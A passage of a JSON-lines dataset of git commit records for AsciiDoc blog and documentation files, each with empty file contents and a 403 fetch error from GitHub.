Password","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-11-29-Unlock-Any-MacBook-Without-The-Password.adoc","new_file":"_posts\/2017-11-29-Unlock-Any-MacBook-Without-The-Password.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The 
requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a52d94b8cc4c9509bce2ae42034ad4257ccbae60","subject":"y2b create post Would You Put This On Your Phone?","message":"y2b create post Would You Put This On Your Phone?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-07-02-Would-You-Put-This-On-Your-Phone.adoc","new_file":"_posts\/2017-07-02-Would-You-Put-This-On-Your-Phone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"616e37891ae7a8635531dd897f10fcb7e88d913d","subject":"job #11491 added review minutes doc","message":"job #11491 added review minutes doc\n","repos":"travislondon\/bridgepoint,rmulvey\/bridgepoint,rmulvey\/bridgepoint,xtuml\/bridgepoint,keithbrown\/bridgepoint,lwriemen\/bridgepoint,perojonsson\/bridgepoint,rmulvey\/bridgepoint,xtuml\/bridgepoint,travislondon\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,rmulvey\/bridgepoint,perojonsson\/bridgepoint,xtuml\/bridgepoint,travislondon\/bridgepoint,perojonsson\/bridgepoint,leviathan747\/bridgepoint,travislondon\/bridgepoint,cortlandstarrett\/bridgepoint,travislondon\/bridgepoint,leviathan747\/bridgepoint,travislondon\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,xtuml\/bridgepoint,travislondon\/bridgepoint,keithbrown\/bridgepoint,travislondon\/bridgepoint,keithbrown\/bridgepoint,leviathan747\/bridgepoint,leviathan747\/bridgepoint,rmulvey\/bridgepoint,lwriemen\/bridgepoint,lwriemen\/bridgepoint,lwriemen\/bridgepoint,perojonsson\/bridgepoint,perojonsson\/bridgepoint,xtuml\/bridgepoint,leviathan747\/bridgepoint,keithbrown\/bridgepoint,keithbrown\/bridgepoint,cortlandstarrett\/bridgepoint,perojonsson\/bridgepoint,leviathan747\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,rmulvey\/bridgepoint,keithbrown\/bridgepoint,xtuml\/bridgepoint,perojonsson\/bridgepoint,cortlandstarrett\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,lwriemen\/bridgepoint,keithbrown\/bridgepoint,rmulvey\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint","old_file":"doc-bridgepoint\/review-minutes\/11491_mcs_rvm.adoc","new_file":"doc-bridgepoint\/review-minutes\/11491_mcs_rvm.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xtuml\/bridgepoint.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"34bea9271cfe64d9dd97b91c22712c8f9fab4d3a","subject":"Scaling alerting intro post (#185)","message":"Scaling alerting intro post 
(#185)\n\n","repos":"pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2016\/07\/05\/scaling-hawkular-alerting.adoc","new_file":"src\/main\/jbake\/content\/blog\/2016\/07\/05\/scaling-hawkular-alerting.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3b64758cf84e51eed5c3af1632d1f0ed63d624b5","subject":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","message":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bf1a9a163379c1306f5ac03315a99c903072eb5c","subject":"Update 2018-06-10-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-H-S-R-P.adoc","message":"Update 2018-06-10-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-H-S-R-P.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-10-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-H-S-R-P.adoc","new_file":"_posts\/2018-06-10-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-H-S-R-P.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"160206e1f974ddaca5d25ab53adcb7a6851fa4c6","subject":"Update 2015-09-20-Python-naing-conventions-for-underscores.adoc","message":"Update 2015-09-20-Python-naing-conventions-for-underscores.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-20-Python-naing-conventions-for-underscores.adoc","new_file":"_posts\/2015-09-20-Python-naing-conventions-for-underscores.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"124cbcfe7b792a5219d66a4582c7f263b64ac6be","subject":"Apply basic spelling fixes","message":"Apply basic spelling fixes\n\nDo a basic spelling check to fix 
mispelled words\n","repos":"funcool\/lentes","old_file":"doc\/content.adoc","new_file":"doc\/content.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/funcool\/lentes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"413df7e62ba490d20acae7335ecefffd97887650","subject":"Update the documentation format.","message":"Update the documentation format.\n","repos":"funcool\/catacumba,funcool\/catacumba,funcool\/catacumba","old_file":"doc\/content.adoc","new_file":"doc\/content.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/funcool\/catacumba.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"2d5f3887fe5ada5aa7e6607c6077a6304e0f6af7","subject":"usage example for apoc.cypher.doIt","message":"usage example for apoc.cypher.doIt\n","repos":"neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures","old_file":"docs\/asciidoc\/modules\/ROOT\/partials\/usage\/apoc.cypher.doIt.adoc","new_file":"docs\/asciidoc\/modules\/ROOT\/partials\/usage\/apoc.cypher.doIt.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/neo4j-contrib\/neo4j-apoc-procedures.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fbba2fd4774e52acd82df11dc33c770490ef64b6","subject":"y2b create post JayBird Freedom Bluetooth Headphones Unboxing \\u0026 Overview (JF3)","message":"y2b create post JayBird Freedom Bluetooth Headphones Unboxing \\u0026 Overview (JF3)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-08-28-JayBird-Freedom-Bluetooth-Headphones-Unboxing-u0026-Overview-JF3.adoc","new_file":"_posts\/2011-08-28-JayBird-Freedom-Bluetooth-Headphones-Unboxing-u0026-Overview-JF3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7b273eeae2c813e51cf8e650a9f0bee06affb0ee","subject":"docs: clean up trimix filling station example","message":"docs: clean up trimix filling station example\n\nSigned-off-by: jaa127 <5d4b395afd293423da3540113194aa7266e85bd8@sn127.fi>","repos":"jaa127\/tackler,jaa127\/tackler,jaa127\/tackler","old_file":"docs\/trimix-filling-station.adoc","new_file":"docs\/trimix-filling-station.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaa127\/tackler.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fc34f40d786cfec675ff1d393279183b362ec14a","subject":"reoranizing","message":"reoranizing\n","repos":"sergehuber\/contextserver-graphql-api","old_file":"docs\/index.adoc","new_file":"docs\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sergehuber\/contextserver-graphql-api.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"055da90706802107aba43194bd0109333509578c","subject":"Update 
2017-04-15-Identifying-the-Successful-Completion-of-Weight-Lifting-Exercises.adoc","message":"Update 2017-04-15-Identifying-the-Successful-Completion-of-Weight-Lifting-Exercises.adoc","repos":"roobyz\/roobyz.github.io,roobyz\/roobyz.github.io,roobyz\/roobyz.github.io,roobyz\/roobyz.github.io","old_file":"_posts\/2017-04-15-Identifying-the-Successful-Completion-of-Weight-Lifting-Exercises.adoc","new_file":"_posts\/2017-04-15-Identifying-the-Successful-Completion-of-Weight-Lifting-Exercises.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/roobyz\/roobyz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"88e735d78d9c7e576fec7cba68e77647a604857b","subject":"Update 2015-11-16-Episode-31-Blah-Cade-Back-Room-2.adoc","message":"Update 2015-11-16-Episode-31-Blah-Cade-Back-Room-2.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2015-11-16-Episode-31-Blah-Cade-Back-Room-2.adoc","new_file":"_posts\/2015-11-16-Episode-31-Blah-Cade-Back-Room-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ab087410cc28e221829305e795688fd1372be795","subject":"Update 2016-04-04-Ubuntu-Server-1404-L-T-S-Tengine.adoc","message":"Update 2016-04-04-Ubuntu-Server-1404-L-T-S-Tengine.adoc","repos":"MichaelIT\/MichaelIT.github.io,MichaelIT\/MichaelIT.github.io,MichaelIT\/MichaelIT.github.io","old_file":"_posts\/2016-04-04-Ubuntu-Server-1404-L-T-S-Tengine.adoc","new_file":"_posts\/2016-04-04-Ubuntu-Server-1404-L-T-S-Tengine.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MichaelIT\/MichaelIT.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"21858e0e4111904b18b73d98fb815cb39ccb785c","subject":"y2b create post The Unbox Therapy Edition iPhone","message":"y2b create post The Unbox Therapy Edition iPhone","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-06-16-The-Unbox-Therapy-Edition-iPhone.adoc","new_file":"_posts\/2017-06-16-The-Unbox-Therapy-Edition-iPhone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"590f2e1824b56365400bdc3b0e8d861829ce0c05","subject":"Update 2015-04-30-Automaticke-overovani-DHPC-pripojeni.adoc","message":"Update 2015-04-30-Automaticke-overovani-DHPC-pripojeni.adoc","repos":"silesnet\/silesnet.github.io,silesnet\/silesnet.github.io,silesnet\/silesnet.github.io","old_file":"_posts\/2015-04-30-Automaticke-overovani-DHPC-pripojeni.adoc","new_file":"_posts\/2015-04-30-Automaticke-overovani-DHPC-pripojeni.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/silesnet\/silesnet.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"23beebf347d37bcb0a5ace3922b91f444e89b256","subject":"Update 
2015-05-07-Estructuras-de-Control-If-Else-While.adoc","message":"Update 2015-05-07-Estructuras-de-Control-If-Else-While.adoc","repos":"Wurser\/wurser.github.io,Wurser\/wurser.github.io,Wurser\/wurser.github.io","old_file":"_posts\/2015-05-07-Estructuras-de-Control-If-Else-While.adoc","new_file":"_posts\/2015-05-07-Estructuras-de-Control-If-Else-While.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Wurser\/wurser.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4b03c199b6a97ee76b1dc042486707be37cde34a","subject":"Update 2015-06-04-Gliffy.adoc","message":"Update 2015-06-04-Gliffy.adoc","repos":"anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog","old_file":"_posts\/2015-06-04-Gliffy.adoc","new_file":"_posts\/2015-06-04-Gliffy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anthonny\/personal-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7b35debb476aeb9e93b169015959035ebecc74c6","subject":"Update 2015-06-23-Experimenting-with-the-Matrix-code-effect.adoc","message":"Update 2015-06-23-Experimenting-with-the-Matrix-code-effect.adoc","repos":"Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io","old_file":"_posts\/2015-06-23-Experimenting-with-the-Matrix-code-effect.adoc","new_file":"_posts\/2015-06-23-Experimenting-with-the-Matrix-code-effect.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ugotsta\/Ugotsta.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dc400770c960d6349c8980646322f2fed9c871b1","subject":"Update 2016-06-11-Como-usar-este-editor.adoc","message":"Update 2016-06-11-Como-usar-este-editor.adoc","repos":"LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io","old_file":"_posts\/2016-06-11-Como-usar-este-editor.adoc","new_file":"_posts\/2016-06-11-Como-usar-este-editor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LearningTools\/LearningTools.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1b8ac1834a8cd4223160ea4f4084590225256876","subject":"Update 2016-06-11-Trabajando-con-Docker.adoc","message":"Update 2016-06-11-Trabajando-con-Docker.adoc","repos":"LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io","old_file":"_posts\/2016-06-11-Trabajando-con-Docker.adoc","new_file":"_posts\/2016-06-11-Trabajando-con-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LearningTools\/LearningTools.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8649e385f1d658bd531a9d093e7548ac8895d95f","subject":"Update 2017-04-20-Sulla-via-del-ritorno.adoc","message":"Update 
2017-04-20-Sulla-via-del-ritorno.adoc","repos":"justafool5\/justafool5.github.io,justafool5\/justafool5.github.io,justafool5\/justafool5.github.io,justafool5\/justafool5.github.io","old_file":"_posts\/2017-04-20-Sulla-via-del-ritorno.adoc","new_file":"_posts\/2017-04-20-Sulla-via-del-ritorno.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/justafool5\/justafool5.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f94a3026a1df58128a9f6ed453f69e1d232c081b","subject":"Update 2010-01-01-Test-Post.adoc","message":"Update 2010-01-01-Test-Post.adoc","repos":"jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io","old_file":"_posts\/2010-01-01-Test-Post.adoc","new_file":"_posts\/2010-01-01-Test-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaredmorgs\/jaredmorgs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b2280f4251e4cbce4cbcc44d586b1a95e561c88c","subject":"Update 2016-04-24-test-post.adoc","message":"Update 2016-04-24-test-post.adoc","repos":"rorosaurus\/hubpress.io,rorosaurus\/hubpress.io,rorosaurus\/hubpress.io,rorosaurus\/hubpress.io","old_file":"_posts\/2016-04-24-test-post.adoc","new_file":"_posts\/2016-04-24-test-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rorosaurus\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f2fc0e0157dc3c29ca0ca2d91eecb6e1ecb06b8e","subject":"Add blueprint doc","message":"Add blueprint 
doc\n","repos":"scranton\/camel,DariusX\/camel,sverkera\/camel,christophd\/camel,NickCis\/camel,mcollovati\/camel,zregvart\/camel,mcollovati\/camel,allancth\/camel,cunningt\/camel,pkletsko\/camel,driseley\/camel,driseley\/camel,jkorab\/camel,lburgazzoli\/apache-camel,nikhilvibhav\/camel,rmarting\/camel,pax95\/camel,objectiser\/camel,RohanHart\/camel,anton-k11\/camel,anoordover\/camel,RohanHart\/camel,pmoerenhout\/camel,RohanHart\/camel,gautric\/camel,tlehoux\/camel,CodeSmell\/camel,anoordover\/camel,snurmine\/camel,davidkarlsen\/camel,adessaigne\/camel,jamesnetherton\/camel,rmarting\/camel,prashant2402\/camel,acartapanis\/camel,yuruki\/camel,christophd\/camel,yuruki\/camel,rmarting\/camel,punkhorn\/camel-upstream,zregvart\/camel,anoordover\/camel,akhettar\/camel,ssharma\/camel,akhettar\/camel,apache\/camel,pkletsko\/camel,lburgazzoli\/camel,Thopap\/camel,tadayosi\/camel,jkorab\/camel,nboukhed\/camel,adessaigne\/camel,kevinearls\/camel,jamesnetherton\/camel,mgyongyosi\/camel,tadayosi\/camel,adessaigne\/camel,rmarting\/camel,cunningt\/camel,allancth\/camel,w4tson\/camel,tdiesler\/camel,driseley\/camel,anoordover\/camel,veithen\/camel,tlehoux\/camel,apache\/camel,allancth\/camel,anton-k11\/camel,dmvolod\/camel,lburgazzoli\/camel,akhettar\/camel,lburgazzoli\/camel,punkhorn\/camel-upstream,acartapanis\/camel,rmarting\/camel,nicolaferraro\/camel,gnodet\/camel,ssharma\/camel,nikhilvibhav\/camel,jonmcewen\/camel,w4tson\/camel,tdiesler\/camel,sverkera\/camel,cunningt\/camel,allancth\/camel,tlehoux\/camel,Thopap\/camel,alvinkwekel\/camel,prashant2402\/camel,isavin\/camel,jonmcewen\/camel,curso007\/camel,mcollovati\/camel,onders86\/camel,akhettar\/camel,snurmine\/camel,tadayosi\/camel,drsquidop\/camel,yuruki\/camel,dmvolod\/camel,gnodet\/camel,zregvart\/camel,zregvart\/camel,sverkera\/camel,NickCis\/camel,lburgazzoli\/apache-camel,allancth\/camel,Fabryprog\/camel,prashant2402\/camel,pmoerenhout\/camel,ullgren\/camel,pax95\/camel,pax95\/camel,anton-k11\/camel,DariusX\/camel,ssharma\/camel,driseley\/camel,curso007\/camel,kevinearls\/camel,lburgazzoli\/apache-camel,acartapanis\/camel,christophd\/camel,acartapanis\/camel,veithen\/camel,scranton\/camel,pkletsko\/camel,christophd\/camel,jonmcewen\/camel,jonmcewen\/camel,snurmine\/camel,Thopap\/camel,onders86\/camel,w4tson\/camel,gnodet\/camel,Thopap\/camel,jamesnetherton\/camel,ssharma\/camel,nboukhed\/camel,nicolaferraro\/camel,jamesnetherton\/camel,nboukhed\/camel,prashant2402\/camel,dmvolod\/camel,anoordover\/camel,prashant2402\/camel,punkhorn\/camel-upstream,pax95\/camel,ullgren\/camel,RohanHart\/camel,salikjan\/camel,nboukhed\/camel,Thopap\/camel,tadayosi\/camel,allancth\/camel,tlehoux\/camel,lburgazzoli\/camel,CodeSmell\/camel,Fabryprog\/camel,drsquidop\/camel,apache\/camel,jkorab\/camel,jkorab\/camel,prashant2402\/camel,adessaigne\/camel,apache\/camel,tdiesler\/camel,Thopap\/camel,kevinearls\/camel,RohanHart\/camel,sverkera\/camel,ssharma\/camel,jamesnetherton\/camel,lburgazzoli\/apache-camel,kevinearls\/camel,chirino\/camel,anton-k11\/camel,mcollovati\/camel,yuruki\/camel,jonmcewen\/camel,jonmcewen\/camel,drsquidop\/camel,anton-k11\/camel,alvinkwekel\/camel,chirino\/camel,pax95\/camel,tlehoux\/camel,chirino\/camel,adessaigne\/camel,akhettar\/camel,pmoerenhout\/camel,lburgazzoli\/apache-camel,driseley\/camel,davidkarlsen\/camel,mgyongyosi\/camel,tdiesler\/camel,onders86\/camel,scranton\/camel,adessaigne\/camel,pmoerenhout\/camel,anton-k11\/camel,gautric\/camel,gnodet\/camel,nikhilvibhav\/camel,kevinearls\/camel,veithen\/camel,objectiser\/camel,dmvolo
d\/camel,jkorab\/camel,lburgazzoli\/camel,pkletsko\/camel,yuruki\/camel,punkhorn\/camel-upstream,christophd\/camel,rmarting\/camel,salikjan\/camel,apache\/camel,dmvolod\/camel,alvinkwekel\/camel,kevinearls\/camel,gnodet\/camel,sverkera\/camel,ullgren\/camel,onders86\/camel,curso007\/camel,lburgazzoli\/camel,acartapanis\/camel,pkletsko\/camel,w4tson\/camel,gautric\/camel,gautric\/camel,mgyongyosi\/camel,gautric\/camel,snurmine\/camel,curso007\/camel,apache\/camel,akhettar\/camel,veithen\/camel,nicolaferraro\/camel,pmoerenhout\/camel,isavin\/camel,tdiesler\/camel,chirino\/camel,gautric\/camel,veithen\/camel,ullgren\/camel,anoordover\/camel,drsquidop\/camel,NickCis\/camel,christophd\/camel,objectiser\/camel,Fabryprog\/camel,tadayosi\/camel,onders86\/camel,yuruki\/camel,w4tson\/camel,dmvolod\/camel,pmoerenhout\/camel,pax95\/camel,veithen\/camel,w4tson\/camel,cunningt\/camel,CodeSmell\/camel,NickCis\/camel,nboukhed\/camel,mgyongyosi\/camel,NickCis\/camel,NickCis\/camel,DariusX\/camel,snurmine\/camel,scranton\/camel,scranton\/camel,Fabryprog\/camel,davidkarlsen\/camel,nboukhed\/camel,snurmine\/camel,objectiser\/camel,pkletsko\/camel,alvinkwekel\/camel,ssharma\/camel,CodeSmell\/camel,nikhilvibhav\/camel,RohanHart\/camel,tlehoux\/camel,drsquidop\/camel,DariusX\/camel,cunningt\/camel,jamesnetherton\/camel,chirino\/camel,curso007\/camel,driseley\/camel,isavin\/camel,isavin\/camel,isavin\/camel,tadayosi\/camel,lburgazzoli\/apache-camel,onders86\/camel,tdiesler\/camel,mgyongyosi\/camel,scranton\/camel,isavin\/camel,curso007\/camel,jkorab\/camel,acartapanis\/camel,sverkera\/camel,davidkarlsen\/camel,cunningt\/camel,chirino\/camel,drsquidop\/camel,mgyongyosi\/camel,nicolaferraro\/camel","old_file":"components\/camel-blueprint\/src\/main\/docs\/blueprint.adoc","new_file":"components\/camel-blueprint\/src\/main\/docs\/blueprint.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/allancth\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6009392e8d1a2e416b95a5bf7247835a31a51744","subject":"Update 2016-01-04-Setting-Up-The-Koder.adoc","message":"Update 2016-01-04-Setting-Up-The-Koder.adoc","repos":"caryfitzhugh\/caryfitzhugh.github.io,caryfitzhugh\/caryfitzhugh.github.io,caryfitzhugh\/caryfitzhugh.github.io","old_file":"_posts\/2016-01-04-Setting-Up-The-Koder.adoc","new_file":"_posts\/2016-01-04-Setting-Up-The-Koder.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/caryfitzhugh\/caryfitzhugh.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c83c2263bd10fd9da800a7ddcafcc74169ea7578","subject":"Update 2016-02-25-Shooting-360-H-D-R-I.adoc","message":"Update 2016-02-25-Shooting-360-H-D-R-I.adoc","repos":"Kif11\/Kif11.github.io,Kif11\/Kif11.github.io,Kif11\/Kif11.github.io,Kif11\/Kif11.github.io","old_file":"_posts\/2016-02-25-Shooting-360-H-D-R-I.adoc","new_file":"_posts\/2016-02-25-Shooting-360-H-D-R-I.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Kif11\/Kif11.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cf4059271a3da2ea08efd54c188ce668fa1b2c89","subject":"Update 2015-01-31-LTSP-Images-servidas-por-Servidor-de-Aula.adoc","message":"Update 
2015-01-31-LTSP-Images-servidas-por-Servidor-de-Aula.adoc","repos":"iesextremadura\/iesextremadura.github.io,iesextremadura\/iesextremadura.github.io,iesextremadura\/iesextremadura.github.io","old_file":"_posts\/2015-01-31-LTSP-Images-servidas-por-Servidor-de-Aula.adoc","new_file":"_posts\/2015-01-31-LTSP-Images-servidas-por-Servidor-de-Aula.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/iesextremadura\/iesextremadura.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c6cec989dcea41c866e4df41182bec7688281f04","subject":"Update 2016-12-24-How-to-use-JavaEE-6-upload-feature-with-configurable-properties-max-filesize-temp-directory-etc-and-Tomcat-performance-tricks.adoc","message":"Update 2016-12-24-How-to-use-JavaEE-6-upload-feature-with-configurable-properties-max-filesize-temp-directory-etc-and-Tomcat-performance-tricks.adoc","repos":"jerometambo\/blog,jerometambo\/blog,jerometambo\/blog,jerometambo\/blog","old_file":"_posts\/2016-12-24-How-to-use-JavaEE-6-upload-feature-with-configurable-properties-max-filesize-temp-directory-etc-and-Tomcat-performance-tricks.adoc","new_file":"_posts\/2016-12-24-How-to-use-JavaEE-6-upload-feature-with-configurable-properties-max-filesize-temp-directory-etc-and-Tomcat-performance-tricks.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jerometambo\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"19f6d6eb1f073338ebd21480cac1157f2b9be3ca","subject":"added queries and types","message":"added queries and types\n","repos":"sergehuber\/contextserver-graphql-api","old_file":"docs\/index.adoc","new_file":"docs\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sergehuber\/contextserver-graphql-api.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"21b1ae940f6e182405d1ca2a99fa5fd2f4d53c81","subject":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","message":"Update 